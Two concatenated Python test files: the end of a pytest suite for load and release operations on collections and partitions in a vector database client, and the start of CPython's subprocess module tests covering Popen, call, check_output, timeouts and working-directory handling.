assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_not_existed(self, connect, collection):
"""
target: test release a collection that does not exist
method: release with a non-existent collection name
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_not_load(self, connect, collection):
"""
target: test release collection without load
method: release collection without load
expected: release successfully
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_after_load_release(self, connect, collection):
"""
target: test load collection after load and release
method: 1.load and release collection after entities flushed
2.re-load collection
expected: No exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_collection(collection)
connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_repeatedly(self, connect, collection):
"""
target: test load collection repeatedly
method: load collection twice
expected: No exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_release_collection(self, connect, collection):
"""
target: test load and release a non-existent (dropped) collection
method: 1. load, release and drop collection
2. load and release dropped collection
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, cons.default_entities)
connect.flush([collection_name])
connect.load_collection(collection_name)
connect.release_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.drop_collection(collection)
try:
connect.release_collection(collection)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_without_flush(self, connect, collection):
"""
target: test load collection without flush
method: insert entities without flush, then load collection
expected: load collection failed
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.load_collection(collection)
# TODO
@pytest.mark.tags(CaseLabel.L2)
def _test_load_collection_larger_than_memory(self):
"""
target: test load collection when memory less than collection size
method: not yet determined (placeholder for a future case)
expected: raise exception
"""
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_release_part_partitions(self, connect, collection):
"""
target: test release part partitions after load collection
method: load collection and release part partitions
expected: searching the released partition raises an exception; the remaining partition still returns results
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
connect.search(collection, default_single_query, partition_names=[default_tag])
res = connect.search(collection, default_single_query, partition_names=[default_partition_name])
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_release_all_partitions(self, connect, collection):
"""
target: test release all partitions after load collection
method: load collection and release all partitions
expected: search empty
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_partition_name, default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L0)
def test_load_partitions_release_collection(self, connect, collection):
"""
target: test release collection after load partitions
method: insert entities into a partition, load the partition, then release the collection and search
expected: search raises an exception after the collection is released
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
# assert len(res[0]) == 0
class TestReleaseAdvanced:
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_during_searching(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into collection, flush and load collection, release collection during searching
expected: search raises an exception once the collection is released
"""
nq = 1000
top_k = 1
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.load_collection(collection)
query, _ = gen_query_vectors(field_name, cons.default_entities, top_k, nq)
future = connect.search(collection, query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_during_searching(self, connect, collection):
"""
target: test release partition during searching
method: insert entities into partition, flush and load partition, release partition during searching
expected: search raises an exception once the partition is released
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_query_vectors(field_name, cons.default_entities, top_k, nq)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, _async=True)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
res = connect.search(collection, default_single_query)
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_during_searching_A(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into partition, flush and load partition, release collection during searching
expected: search raises an exception once the collection is released
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_query_vectors(field_name, cons.default_entities, top_k, nq)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def _test_release_collection_during_loading(self, connect, collection):
"""
target: test release collection during loading
method: insert entities into collection, flush, release collection during loading
expected:
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def _test_release_partition_during_loading(self, connect, collection):
"""
target: test release partition during loading
method: insert entities into partition, flush, release partition during loading
expected:
"""
connect.create_partition(collection, default_tag)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_partitions(collection, [default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
def _test_release_collection_during_inserting(self, connect, collection):
"""
target: test release collection during inserting
method: load collection, do release collection during inserting
expected:
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.load_collection(collection)
def insert():
connect.insert(collection, cons.default_entities)
t = threading.Thread(target=insert, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
res = connect.search(collection, default_single_query)
# assert len(res[0]) == 0
def _test_release_collection_during_indexing(self, connect, collection):
"""
target: test release collection during building index
method: insert and flush, load collection, do release collection during creating index
expected:
"""
pass
def _test_release_collection_during_dropping_index(self, connect, collection):
"""
target: test release collection during dropping index
method: insert, create index and flush, load collection, do release collection during dropping index
expected:
"""
pass
class TestLoadCollectionInvalid(object):
"""
Test load collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test load invalid collection
method: load collection with invalid name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.load_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test release invalid collection
method: release collection with invalid name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.release_collection(collection_name)
class TestLoadPartition:
"""
******************************************************************
The following cases are used to test `load_partitions`/`release_partitions` functions
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in cpu mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.mark.tags(CaseLabel.L0)
def test_load_partition_after_index_binary(self, connect, binary_collection, get_binary_index):
"""
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, cons.default_binary_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
logging.getLogger().info(metric_type)
get_binary_index["metric_type"] = metric_type
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
connect.load_partitions(binary_collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_dis_connect(self, connect, dis_connect, collection):
"""
target: test load partitions, without connection
method: load partitions with correct params, with a disconnected instance
expected: load raise exception
"""
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
dis_connect.load_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_dis_connect(self, connect, dis_connect, collection):
"""
target: test release partitions, without connection
method: release partitions with correct params, with a disconnected instance
expected: release raise exception
"""
connect.create_partition(collection, default_tag)
connect.load_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
dis_connect.release_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L0)
def test_load_partition_not_existed(self, connect, collection):
"""
target: test load partition for invalid scenario
method: load a partition that does not exist
expected: raise exception and report the error
"""
partition_name = gen_unique_str(uid_load)
try:
connect.load_partitions(collection, [partition_name])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % partition_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_partition_not_load(self, connect, collection):
"""
target: test release partition without load
method: release partition without load
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.release_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_load_release_after_drop(self, connect, collection):
"""
target: test load and release partition after drop
method: drop partition and then load and release it
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.L0)
def test_release_partition_after_drop(self, connect, collection):
"""
target: test release partition after drop
method: insert and flush, then load and drop the partition, then load it again
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.L0)
def test_load_release_after_collection_drop(self, connect, collection):
"""
target: test load and release partition after the collection is dropped
method: insert and flush, load and release the partition, drop the collection, then load and release again
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_collection(collection)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
class TestLoadPartitionInvalid(object):
"""
Test load partition with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_partition_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
"""
target: test load invalid partition
method: load partition with invalid partition name
expected: raise exception
"""
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.load_partitions(collection, [partition_name])
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
"""
target: test release invalid partition
method: release partition with invalid partition name
expected: raise exception
"""
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.release_partitions(collection, [partition_name])
|
test_subprocess.py
|
import unittest
from unittest import mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import warnings_helper
import subprocess
import sys
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import traceback
import types
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
import json
import pathlib
from test.support.os_helper import FakePath
try:
import _testcapi
except ImportError:
_testcapi = None
try:
import pwd
except ImportError:
pwd = None
try:
import grp
except ImportError:
grp = None
try:
import fcntl
except ImportError:
fcntl = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
if not support.has_subprocess_support:
raise unittest.SkipTest("test module requires subprocess")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
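# Illustrative note (not from the original file): this tuple is handed straight
# to assertRaises further down, e.g.
#     self.assertRaises(NONEXISTING_ERRORS, self._assert_python, pre_args,
#                       executable=NONEXISTING_CMD[0])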
ZERO_RETURN_CMD = (sys.executable, '-c', 'pass')
def setUpModule():
shell_true = shutil.which('true')
if shell_true is None:
return
if (os.access(shell_true, os.X_OK) and
subprocess.run([shell_true]).returncode == 0):
global ZERO_RETURN_CMD
ZERO_RETURN_CMD = (shell_true,) # Faster than Python startup.
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
if not mswindows:
# subprocess._active is not used on Windows and is set to None.
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(
subprocess._active, "subprocess._active not empty"
)
self.doCleanups()
support.reap_children()
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call(ZERO_RETURN_CMD)
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
with self.assertRaisesRegex(ValueError,
"stdout argument not allowed, it will be overridden"):
subprocess.check_output([], stdout=None)
with self.assertRaisesRegex(ValueError,
"check argument not allowed, it will be overridden"):
subprocess.check_output([], check=False)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_input_none(self):
"""input=None has a legacy meaning of input='' on check_output."""
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None)
self.assertNotIn(b'XX', output)
def test_check_output_input_none_text(self):
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None, text=True)
self.assertNotIn('XX', output)
def test_check_output_input_none_universal_newlines(self):
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; print('XX' if sys.stdin.read() else '')"],
input=None, universal_newlines=True)
self.assertNotIn('XX', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_bytes_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=os.fsencode(sys.executable))
def test_pathlike_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=FakePath(sys.executable))
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_bytes_executable_replaces_shell(self):
self._assert_python([], executable=os.fsencode(sys.executable),
shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_pathlike_executable_replaces_shell(self):
self._assert_python([], executable=FakePath(sys.executable),
shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with os_helper.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"buf = sys.stdout.buffer; "
"buf.write(os.getcwd().encode()); "
"buf.flush(); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode()))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_bytes(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=os.fsencode(temp_dir))
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with os_helper.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with os_helper.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with os_helper.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
